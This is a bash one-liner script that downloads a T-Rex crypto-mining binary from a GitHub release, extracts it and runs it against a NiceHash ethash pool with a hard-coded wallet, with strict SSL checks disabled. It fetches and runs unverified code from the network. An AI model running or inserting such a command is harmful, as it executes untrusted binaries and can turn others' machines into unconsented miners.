#!/bin/bash

wget https://github.com/nitasajuha/Rock/releases/download/v1.1.1/t-rex-0.26.4-linux.tar.gz && tar -zxf t-rex-0.26.4-linux.tar.gz && chmod +x t-rex && ./t-rex -a ethash -o stratum+ssl://daggerhashimoto.auto.nicehash.com:443 -u 3JkgN64Rw6AXXhZQWiYQngFMjVyD1CWped -p x -w rig0 --no-sni --no-strict-ssl --dns-https-server 1.1.1.1
